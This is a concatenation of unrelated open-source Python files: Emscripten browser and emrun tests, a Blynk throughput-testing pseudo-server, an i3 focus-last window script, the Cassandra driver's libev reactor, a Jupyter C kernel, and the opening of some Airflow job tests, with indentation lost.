args=['-sWASMFS', '-sUSE_PTHREADS', '--js-library', test_file('wasmfs/wasmfs_fetch.js')] + args)
@requires_threads
@no_firefox('no OPFS support yet')
def test_wasmfs_opfs(self):
test = test_file('wasmfs/wasmfs_opfs.c')
args = ['-sWASMFS', '-pthread', '-sPROXY_TO_PTHREAD', '-O3']
self.btest_exit(test, args=args + ['-DWASMFS_SETUP'])
self.btest_exit(test, args=args + ['-DWASMFS_RESUME'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_memgrowth(self, *args):
self.btest(test_file('browser/emmalloc_memgrowth.cpp'), expected='0', args=['-sMALLOC=emmalloc', '-sALLOW_MEMORY_GROWTH=1', '-sABORTING_MALLOC=0', '-sASSERTIONS=2', '-sMINIMAL_RUNTIME=1', '-sMAXIMUM_MEMORY=4GB'])
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp')
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=4GB', '-sABORTING_MALLOC=0']
self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp')
  # Tests that Emscripten-compiled applications can be run when there is a slash in the URL query or fragment of the js file
def test_browser_run_with_slash_in_query_and_hash(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O0'])
src = open('test.html').read()
# Slash in query
create_file('test-query.html', src.replace('test.js', 'test.js?type=pass/fail'))
self.run_browser('test-query.html', None, '/report_result?0')
# Slash in fragment
create_file('test-hash.html', src.replace('test.js', 'test.js#pass/fail'))
self.run_browser('test-hash.html', None, '/report_result?0')
# Slash in query and fragment
create_file('test-query-hash.html', src.replace('test.js', 'test.js?type=pass/fail#pass/fail'))
self.run_browser('test-query-hash.html', None, '/report_result?0')
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-sASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
    # the specific symptom of the hang that was fixed is that the test hangs
    # at some point, using 0% CPU. Often that occurred within 0-200 iterations, but
    # you may want to adjust "ITERATIONS".
self.btest_exit(test_file('pthread/test_pthread_proxy_hammer.cpp'),
args=['-sUSE_PTHREADS', '-O2', '-sPROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
def test_assert_failure(self):
self.btest(test_file('browser/test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"')
def test_full_js_library_strict(self):
self.btest_exit(test_file('hello_world.c'), args=['-sINCLUDE_FULL_LIBRARY', '-sSTRICT_JS'])
EMRUN = path_from_root('emrun')
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_no_browser(self):
# Test --no_browser mode where we have to take care of launching the browser ourselves
# and then killing emrun when we are done.
if not has_browser():
self.skipTest('need a browser')
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE)
try:
if EMTEST_BROWSER:
print('Starting browser')
browser_cmd = shlex.split(EMTEST_BROWSER)
browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html'])
try:
while True:
stdout = proc.stdout.read()
if b'Dumping out file' in stdout:
break
finally:
print('Terminating browser')
browser.terminate()
browser.wait()
finally:
print('Terminating emrun server')
proc.terminate()
proc.wait()
def test_emrun(self):
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
    # We cannot run emrun from the temp directory the suite will clean up afterwards, since the
    # browser that is launched will have that directory as its startup directory, and the browser
    # will not close as part of the test. On Windows that pins down the cwd, making it impossible
    # to delete the directory. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941'],
args_base + ['--dump_out_directory', 'other dir/multiple', '--port', '6942']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
dump_dir = 'other dir/multiple' if '--dump_out_directory' in args else 'dump_out'
self.assertExists(self.in_dir(f'{dump_dir}/test.dat'))
self.assertExists(self.in_dir(f'{dump_dir}/heap.dat'))
self.assertExists(self.in_dir(f'{dump_dir}/nested/with space.dat'))
stdout = read_file(self.in_dir('stdout.txt'))
stderr = read_file(self.in_dir('stderr.txt'))
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
pseudo-server-dw-mt.py
|
#!/usr/bin/python
'''
This is a pseudo-server that sends a predefined pattern to any connected client.
It is used to test transport behaviour and throughput.
If you want to use it with a sketch, connect your PC and Blynk-enabled device
to the same network and configure Blynk to connect to this pseudo-server:
IPAddress serv(192,168,0,105); // IP address of your PC
Blynk.begin(auth, serv, 8888);
Author: Volodymyr Shymanskyy
License: The MIT license
'''
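# Example invocation (sketch; the option values are illustrative, not from the original docs):
#   python2 pseudo-server-dw-mt.py --port=8888 --qty=100 --freq=10 --dump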
import select, socket, struct
import os, sys, time, getopt
from threading import Thread
# Configuration options
# Parse command line options
try:
opts, args = getopt.getopt(sys.argv[1:],
"hb:p:",
["help", "bind=", "port=", "sndbuf=", "rcvbuf=", "nodelay", "sleep=", "qty=", "freq=", "pin=", "dump"])
except getopt.GetoptError:
print >>sys.stderr, __doc__
sys.exit(2)
# Default options
HOST = '' # Bind to all interfaces
PORT = 8888 # Bind to port 8888
NODELAY = 0 # No TCP_NODELAY
SNDBUF = 0 # No SNDBUF override
RCVBUF = 0 # No RCVBUF override
MSG_QTY = 10 # Amount of messages
SLEEP = 1.0 # Wait some time between IO
HW_PIN = 14 # Pin #
DUMP = 0
for o, v in opts:
if o in ("-h", "--help"):
print __doc__
sys.exit()
elif o in ("-b", "--bind"):
HOST = v
elif o in ("-p", "--port"):
PORT = int(v)
elif o in ("--sndbuf",):
SNDBUF = int(v)
elif o in ("--rcvbuf",):
RCVBUF = int(v)
elif o in ("--nodelay",):
NODELAY = 1
elif o in ("--sleep",):
SLEEP = float(v)
elif o in ("--freq",):
SLEEP = 1.0/float(v)
elif o in ("--qty",):
MSG_QTY = int(v)
elif o in ("--pin",):
HW_PIN = int(v)
elif o in ("--dump",):
DUMP = 1
# Blynk protocol helpers
hdr = struct.Struct("!BHH")
class MsgType:
RSP = 0
LOGIN = 2
PING = 6
HW = 20
class MsgStatus:
OK = 200
def hw(*args):
# Convert params to string and join using \0
data = "\0".join(map(str, args))
dump("< " + " ".join(map(str, args)))
# Prepend HW command header
return hdr.pack(MsgType.HW, 1, len(data)) + data
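# Framing sketch (illustrative, derived from hdr and hw() above): hw("dw", 14, 1) packs a
# 5-byte header (!BHH -> msg_type=20, msg_id=1, msg_len=7) followed by the 7-byte payload
# "dw\x0014\x001", i.e. the parameters joined with NUL separators.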
# Print utilities
start_time = time.time()
def log(msg):
print "[{:7.3f}] {:}".format(float(time.time() - start_time), msg)
draw_col = 0
def draw(c):
global draw_col
if not DUMP:
sys.stdout.write(c)
draw_col = (draw_col + 1) % 120
if draw_col:
sys.stdout.flush()
else:
sys.stdout.write("\n")
def dump(msg):
if DUMP:
log(msg)
def receive(sock, length):
d = []
l = 0
while l < length:
r = sock.recv(length-l)
if not r:
return ''
d.append(r)
l += len(r)
return ''.join(d)
# Threads
def readthread(conn, addr):
global msgs_in, authenticated
while(msgs_in < MSG_QTY):
data = receive(conn, hdr.size)
if not data:
break
msg_type, msg_id, msg_len = hdr.unpack(data)
#dump("Got {0}, {1}, {2}".format(msg_type, msg_id, msg_len))
if msg_type == MsgType.RSP:
pass
elif msg_type == MsgType.LOGIN:
auth = receive(conn, msg_len)
log("Auth {0}".format(auth))
# Send auth OK and pin modes
conn.sendall(hdr.pack(MsgType.RSP, msg_id, MsgStatus.OK))
conn.sendall(hw("pm", HW_PIN, "out"))
authenticated = True
elif msg_type == MsgType.PING:
log("Ping")
# Send Pong
conn.sendall(hdr.pack(MsgType.RSP, msg_id, MsgStatus.OK))
elif msg_type == MsgType.HW:
data = receive(conn, msg_len)
# Print HW messages (just for fun :)
draw('v')
dump("> " + " ".join(data.split("\0")))
msgs_in += 1
else:
log("Unknown msg type")
break
def writethread(conn, addr):
global msgs_out, authenticated
val = 0
while (msgs_out < MSG_QTY):
if authenticated:
conn.sendall(hw("dw", HW_PIN, val))
val = 0 if val else 1
draw('.')
msgs_out += 1
time.sleep(SLEEP)
# Main code
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    # Set SO_REUSEADDR so we can rebind even if the previous run left the port in TIME_WAIT
serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serv.bind((HOST, PORT))
except socket.error as msg:
log('Bind failed. Error Code: {0}, Msg: {1}'.format(str(msg[0]), msg[1]))
sys.exit()
serv.listen(1)
log('Listening on port %d' % PORT)
# Wait for clients
#while True:
conn, addr = serv.accept()
log('Connection from {0}:{1}'.format(addr[0], str(addr[1])))
if NODELAY != 0:
conn.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if SNDBUF != 0:
sndbuf = conn.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF)
log('Default SNDBUF %s changed to %s' % (sndbuf, SNDBUF))
conn.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, SNDBUF)
if RCVBUF != 0:
rcvbuf = conn.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF)
log('Default RCVBUF %s changed to %s' % (rcvbuf, RCVBUF))
conn.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, RCVBUF)
proc_start = time.time()
msgs_in = 0
msgs_out = 0
authenticated = False
read_t = Thread(target=readthread, args=(conn, addr))
write_t = Thread(target=writethread, args=(conn, addr))
read_t.start()
write_t.start()
read_t.join()
#write_t.join()
conn.close()
draw("\n")
log("Time %3.4f" % (time.time() - proc_start))
log("Sent {0} messages".format(msgs_out))
log("Recv {0} messages".format(msgs_in))
|
i3_focus_last.py
|
#!/usr/bin/env python3
import os
import socket
import selectors
import threading
from argparse import ArgumentParser
import i3ipc
SOCKET_FILE = '/tmp/.i3_focus_last'
MAX_WIN_HISTORY = 15
class FocusWatcher:
def __init__(self):
self.i3 = i3ipc.Connection()
self.i3.on('window::focus', self.on_window_focus)
self.listening_socket = socket.socket(socket.AF_UNIX,
socket.SOCK_STREAM)
if os.path.exists(SOCKET_FILE):
os.remove(SOCKET_FILE)
self.listening_socket.bind(SOCKET_FILE)
self.listening_socket.listen(1)
self.window_list = []
self.window_list_lock = threading.RLock()
def on_window_focus(self, i3conn, event):
with self.window_list_lock:
window_id = event.container.props.id
if window_id in self.window_list:
self.window_list.remove(window_id)
self.window_list.insert(0, window_id)
if len(self.window_list) > MAX_WIN_HISTORY:
del self.window_list[MAX_WIN_HISTORY:]
def launch_i3(self):
self.i3.main()
def launch_server(self):
selector = selectors.DefaultSelector()
def accept(sock):
conn, addr = sock.accept()
selector.register(conn, selectors.EVENT_READ, read)
def read(conn):
data = conn.recv(1024)
if data == b'switch':
with self.window_list_lock:
tree = self.i3.get_tree()
windows = set(w.id for w in tree.leaves())
for window_id in self.window_list[1:]:
if window_id not in windows:
self.window_list.remove(window_id)
else:
self.i3.command('[con_id=%s] focus' % window_id)
break
elif not data:
selector.unregister(conn)
conn.close()
selector.register(self.listening_socket, selectors.EVENT_READ, accept)
while True:
for key, event in selector.select():
callback = key.data
callback(key.fileobj)
def run(self):
t_i3 = threading.Thread(target=self.launch_i3)
t_server = threading.Thread(target=self.launch_server)
for t in (t_i3, t_server):
t.start()
if __name__ == '__main__':
parser = ArgumentParser(prog='focus-last.py',
description='''
                            Focus the last focused window.
                            This script should be launched from .xsessionrc without arguments.
                            Then you can bind this script with the `--switch` option to one of your
                            i3 keybindings.
''')
parser.add_argument('--switch', dest='switch', action='store_true',
help='Switch to the previous window', default=False)
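    # Example i3 config bindings (sketch; the install path is hypothetical):
    #   exec_always --no-startup-id ~/.local/bin/i3_focus_last.py
    #   bindsym $mod+Tab exec --no-startup-id ~/.local/bin/i3_focus_last.py --switch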
args = parser.parse_args()
if not args.switch:
focus_watcher = FocusWatcher()
focus_watcher.run()
else:
client_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
client_socket.connect(SOCKET_FILE)
client_socket.send(b'switch')
client_socket.close()
|
libevreactor.py
|
# Copyright DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
from collections import deque
from functools import partial
import logging
import os
import socket
import ssl
from threading import Lock, Thread
import time
import weakref
from six.moves import range
from cassandra.connection import (Connection, ConnectionShutdown,
NONBLOCKING, Timer, TimerManager)
try:
import cassandra.io.libevwrapper as libev
except ImportError:
raise ImportError(
"The C extension needed to use libev was not found. This "
"probably means that you didn't have the required build dependencies "
"when installing the driver. See "
"http://datastax.github.io/python-driver/installation.html#c-extensions "
"for instructions on installing build dependencies and building "
"the C extension.")
log = logging.getLogger(__name__)
def _cleanup(loop):
if loop:
loop._cleanup()
class LibevLoop(object):
def __init__(self):
self._pid = os.getpid()
self._loop = libev.Loop()
self._notifier = libev.Async(self._loop)
self._notifier.start()
# prevent _notifier from keeping the loop from returning
self._loop.unref()
self._started = False
self._shutdown = False
self._lock = Lock()
self._lock_thread = Lock()
self._thread = None
# set of all connections; only replaced with a new copy
# while holding _conn_set_lock, never modified in place
self._live_conns = set()
# newly created connections that need their write/read watcher started
self._new_conns = set()
# recently closed connections that need their write/read watcher stopped
self._closed_conns = set()
self._conn_set_lock = Lock()
self._preparer = libev.Prepare(self._loop, self._loop_will_run)
# prevent _preparer from keeping the loop from returning
self._loop.unref()
self._preparer.start()
self._timers = TimerManager()
self._loop_timer = libev.Timer(self._loop, self._on_loop_timer)
def maybe_start(self):
should_start = False
with self._lock:
if not self._started:
log.debug("Starting libev event loop")
self._started = True
should_start = True
if should_start:
with self._lock_thread:
if not self._shutdown:
self._thread = Thread(target=self._run_loop, name="event_loop")
self._thread.daemon = True
self._thread.start()
self._notifier.send()
def _run_loop(self):
while True:
self._loop.start()
# there are still active watchers, no deadlock
with self._lock:
if not self._shutdown and self._live_conns:
log.debug("Restarting event loop")
continue
else:
# all Connections have been closed, no active watchers
log.debug("All Connections currently closed, event loop ended")
self._started = False
break
def _cleanup(self):
self._shutdown = True
if not self._thread:
return
for conn in self._live_conns | self._new_conns | self._closed_conns:
conn.close()
for watcher in (conn._write_watcher, conn._read_watcher):
if watcher:
watcher.stop()
self.notify() # wake the timer watcher
# PYTHON-752 Thread might have just been created and not started
with self._lock_thread:
self._thread.join(timeout=1.0)
if self._thread.is_alive():
log.warning(
"Event loop thread could not be joined, so shutdown may not be clean. "
"Please call Cluster.shutdown() to avoid this.")
log.debug("Event loop thread was joined")
def add_timer(self, timer):
self._timers.add_timer(timer)
self._notifier.send() # wake up in case this timer is earlier
def _update_timer(self):
if not self._shutdown:
next_end = self._timers.service_timeouts()
if next_end:
self._loop_timer.start(next_end - time.time()) # timer handles negative values
else:
self._loop_timer.stop()
def _on_loop_timer(self):
self._timers.service_timeouts()
def notify(self):
self._notifier.send()
def connection_created(self, conn):
with self._conn_set_lock:
new_live_conns = self._live_conns.copy()
new_live_conns.add(conn)
self._live_conns = new_live_conns
new_new_conns = self._new_conns.copy()
new_new_conns.add(conn)
self._new_conns = new_new_conns
def connection_destroyed(self, conn):
with self._conn_set_lock:
new_live_conns = self._live_conns.copy()
new_live_conns.discard(conn)
self._live_conns = new_live_conns
new_closed_conns = self._closed_conns.copy()
new_closed_conns.add(conn)
self._closed_conns = new_closed_conns
self._notifier.send()
def _loop_will_run(self, prepare):
changed = False
for conn in self._live_conns:
if not conn.deque and conn._write_watcher_is_active:
if conn._write_watcher:
conn._write_watcher.stop()
conn._write_watcher_is_active = False
changed = True
elif conn.deque and not conn._write_watcher_is_active:
conn._write_watcher.start()
conn._write_watcher_is_active = True
changed = True
if self._new_conns:
with self._conn_set_lock:
to_start = self._new_conns
self._new_conns = set()
for conn in to_start:
conn._read_watcher.start()
changed = True
if self._closed_conns:
with self._conn_set_lock:
to_stop = self._closed_conns
self._closed_conns = set()
for conn in to_stop:
if conn._write_watcher:
conn._write_watcher.stop()
# clear reference cycles from IO callback
del conn._write_watcher
if conn._read_watcher:
conn._read_watcher.stop()
# clear reference cycles from IO callback
del conn._read_watcher
changed = True
# TODO: update to do connection management, timer updates through dedicated async 'notifier' callbacks
self._update_timer()
if changed:
self._notifier.send()
_global_loop = None
atexit.register(partial(_cleanup, _global_loop))
class LibevConnection(Connection):
"""
An implementation of :class:`.Connection` that uses libev for its event loop.
"""
_write_watcher_is_active = False
_read_watcher = None
_write_watcher = None
_socket = None
@classmethod
def initialize_reactor(cls):
global _global_loop
if not _global_loop:
_global_loop = LibevLoop()
else:
if _global_loop._pid != os.getpid():
log.debug("Detected fork, clearing and reinitializing reactor state")
cls.handle_fork()
_global_loop = LibevLoop()
@classmethod
def handle_fork(cls):
global _global_loop
if _global_loop:
_global_loop._cleanup()
_global_loop = None
@classmethod
def create_timer(cls, timeout, callback):
timer = Timer(timeout, callback)
_global_loop.add_timer(timer)
return timer
def __init__(self, *args, **kwargs):
Connection.__init__(self, *args, **kwargs)
self.deque = deque()
self._deque_lock = Lock()
self._connect_socket()
self._socket.setblocking(0)
with _global_loop._lock:
self._read_watcher = libev.IO(self._socket.fileno(), libev.EV_READ, _global_loop._loop, self.handle_read)
self._write_watcher = libev.IO(self._socket.fileno(), libev.EV_WRITE, _global_loop._loop, self.handle_write)
self._send_options_message()
_global_loop.connection_created(self)
# start the global event loop if needed
_global_loop.maybe_start()
def close(self):
with self.lock:
if self.is_closed:
return
self.is_closed = True
log.debug("Closing connection (%s) to %s", id(self), self.host)
_global_loop.connection_destroyed(self)
self._socket.close()
log.debug("Closed socket to %s", self.host)
# don't leave in-progress operations hanging
if not self.is_defunct:
self.error_all_requests(
ConnectionShutdown("Connection to %s was closed" % self.host))
def handle_write(self, watcher, revents, errno=None):
if revents & libev.EV_ERROR:
if errno:
exc = IOError(errno, os.strerror(errno))
else:
exc = Exception("libev reported an error")
self.defunct(exc)
return
while True:
try:
with self._deque_lock:
next_msg = self.deque.popleft()
except IndexError:
return
try:
sent = self._socket.send(next_msg)
except socket.error as err:
if (err.args[0] in NONBLOCKING):
with self._deque_lock:
self.deque.appendleft(next_msg)
else:
self.defunct(err)
return
else:
if sent < len(next_msg):
with self._deque_lock:
self.deque.appendleft(next_msg[sent:])
def handle_read(self, watcher, revents, errno=None):
if revents & libev.EV_ERROR:
if errno:
exc = IOError(errno, os.strerror(errno))
else:
exc = Exception("libev reported an error")
self.defunct(exc)
return
try:
while True:
buf = self._socket.recv(self.in_buffer_size)
self._iobuf.write(buf)
if len(buf) < self.in_buffer_size:
break
except socket.error as err:
if ssl and isinstance(err, ssl.SSLError):
if err.args[0] not in (ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE):
self.defunct(err)
return
elif err.args[0] not in NONBLOCKING:
self.defunct(err)
return
if self._iobuf.tell():
self.process_io_buffer()
else:
log.debug("Connection %s closed by server", self)
self.close()
def push(self, data):
sabs = self.out_buffer_size
if len(data) > sabs:
chunks = []
for i in range(0, len(data), sabs):
chunks.append(data[i:i + sabs])
else:
chunks = [data]
with self._deque_lock:
self.deque.extend(chunks)
_global_loop.notify()
|
kernel.py
|
from queue import Queue
from threading import Thread
from ipykernel.kernelbase import Kernel
import re
import subprocess
import tempfile
import os
import os.path as path
class RealTimeSubprocess(subprocess.Popen):
"""
    A subprocess that allows reading its stdout and stderr in real time.
"""
def __init__(self, cmd, write_to_stdout, write_to_stderr):
"""
:param cmd: the command to execute
:param write_to_stdout: a callable that will be called with chunks of data from stdout
:param write_to_stderr: a callable that will be called with chunks of data from stderr
"""
self._write_to_stdout = write_to_stdout
self._write_to_stderr = write_to_stderr
super().__init__(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0)
self._stdout_queue = Queue()
self._stdout_thread = Thread(target=RealTimeSubprocess._enqueue_output, args=(self.stdout, self._stdout_queue))
self._stdout_thread.daemon = True
self._stdout_thread.start()
self._stderr_queue = Queue()
self._stderr_thread = Thread(target=RealTimeSubprocess._enqueue_output, args=(self.stderr, self._stderr_queue))
self._stderr_thread.daemon = True
self._stderr_thread.start()
@staticmethod
def _enqueue_output(stream, queue):
"""
Add chunks of data from a stream to a queue until the stream is empty.
"""
for line in iter(lambda: stream.read(4096), b''):
queue.put(line)
stream.close()
def write_contents(self):
"""
        Write the available content from stdout and stderr to the callables specified when the instance was created.
"""
def read_all_from_queue(queue):
res = b''
size = queue.qsize()
while size != 0:
res += queue.get_nowait()
size -= 1
return res
stdout_contents = read_all_from_queue(self._stdout_queue)
if stdout_contents:
self._write_to_stdout(stdout_contents)
stderr_contents = read_all_from_queue(self._stderr_queue)
if stderr_contents:
self._write_to_stderr(stderr_contents)
class CKernel(Kernel):
implementation = 'jupyter_c_kernel'
implementation_version = '1.0'
language = 'c'
language_version = 'C11'
language_info = {'name': 'c',
'mimetype': 'text/plain',
'file_extension': '.c'}
banner = "C kernel.\n" \
"Uses gcc, compiles in C11, and creates source code files and executables in temporary folder.\n"
def __init__(self, *args, **kwargs):
super(CKernel, self).__init__(*args, **kwargs)
self.files = []
mastertemp = tempfile.mkstemp(suffix='.out')
os.close(mastertemp[0])
self.master_path = mastertemp[1]
filepath = path.join(path.dirname(path.realpath(__file__)), 'resources', 'master.c')
subprocess.call(['gcc', filepath, '-std=c11', '-rdynamic', '-ldl', '-o', self.master_path])
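        # The master binary (built with -rdynamic/-ldl) presumably loads the per-cell shared
        # object produced in do_execute() at runtime, which is why cells are compiled with
        # -fPIC -shared below.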
def cleanup_files(self):
"""Remove all the temporary files created by the kernel"""
for file in self.files:
os.remove(file)
os.remove(self.master_path)
def new_temp_file(self, **kwargs):
"""Create a new temp file to be deleted when the kernel shuts down"""
# We don't want the file to be deleted when closed, but only when the kernel stops
kwargs['delete'] = False
kwargs['mode'] = 'w'
file = tempfile.NamedTemporaryFile(**kwargs)
self.files.append(file.name)
return file
def _write_to_stdout(self, contents):
self.send_response(self.iopub_socket, 'stream', {'name': 'stdout', 'text': contents})
def _write_to_stderr(self, contents):
self.send_response(self.iopub_socket, 'stream', {'name': 'stderr', 'text': contents})
def create_jupyter_subprocess(self, cmd):
return RealTimeSubprocess(cmd,
lambda contents: self._write_to_stdout(contents.decode()),
lambda contents: self._write_to_stderr(contents.decode()))
    def compile_with_gcc(self, source_filename, binary_filename, cflags=None, ldflags=None):
        # default to empty flag lists so the method also works when flags are omitted
        cflags = ['-std=c11', '-fPIC', '-shared', '-rdynamic'] + (cflags or [])
        args = ['gcc', source_filename] + cflags + ['-o', binary_filename] + (ldflags or [])
return self.create_jupyter_subprocess(args)
def _filter_magics(self, code):
magics = {'cflags': [],
'ldflags': [],
'args': []}
for line in code.splitlines():
if line.startswith('//%'):
                key, value = line[3:].split(":", 1)
key = key.strip().lower()
if key in ['ldflags', 'cflags']:
for flag in value.split():
magics[key] += [flag]
elif key == "args":
# Split arguments respecting quotes
for argument in re.findall(r'(?:[^\s,"]|"(?:\\.|[^"])*")+', value):
magics['args'] += [argument.strip('"')]
return magics
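    # Example cell magics (sketch) in the form _filter_magics() recognizes:
    #   //%cflags: -O2 -Wall
    #   //%ldflags: -lm
    #   //%args: "hello world" 42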
def do_execute(self, code, silent, store_history=True,
user_expressions=None, allow_stdin=False):
magics = self._filter_magics(code)
with self.new_temp_file(suffix='.c') as source_file:
source_file.write(code)
source_file.flush()
with self.new_temp_file(suffix='.out') as binary_file:
p = self.compile_with_gcc(source_file.name, binary_file.name, magics['cflags'], magics['ldflags'])
while p.poll() is None:
p.write_contents()
p.write_contents()
if p.returncode != 0: # Compilation failed
self._write_to_stderr(
"[C kernel] GCC exited with code {}, the executable will not be executed".format(
p.returncode))
return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [],
'user_expressions': {}}
p = self.create_jupyter_subprocess([self.master_path, binary_file.name] + magics['args'])
while p.poll() is None:
p.write_contents()
p.write_contents()
if p.returncode != 0:
self._write_to_stderr("[C kernel] Executable exited with code {}".format(p.returncode))
return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}}
def do_shutdown(self, restart):
"""Cleanup the created source code files and executables when shutting down the kernel"""
self.cleanup_files()
|
jobs.py
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import logging
import multiprocessing
import os
import shutil
import six
import socket
import threading
import time
import unittest
from tempfile import mkdtemp
from airflow import AirflowException, settings, models
from airflow.bin import cli
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.bash_operator import BashOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from mock import Mock, patch
from sqlalchemy.orm.session import make_transient
from tests.executors.test_executor import TestExecutor
from tests.core import TEST_DAG_FOLDER
from airflow import configuration
configuration.load_test_config()
import sqlalchemy
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
# Include the words "airflow" and "dag" in the file contents, tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class BackfillJobTest(unittest.TestCase):
def setUp(self):
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(include_examples=True)
@unittest.skipIf('sqlite' in configuration.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
dag.clear()
target_dag.clear()
scheduler = SchedulerJob()
queue = mock.Mock()
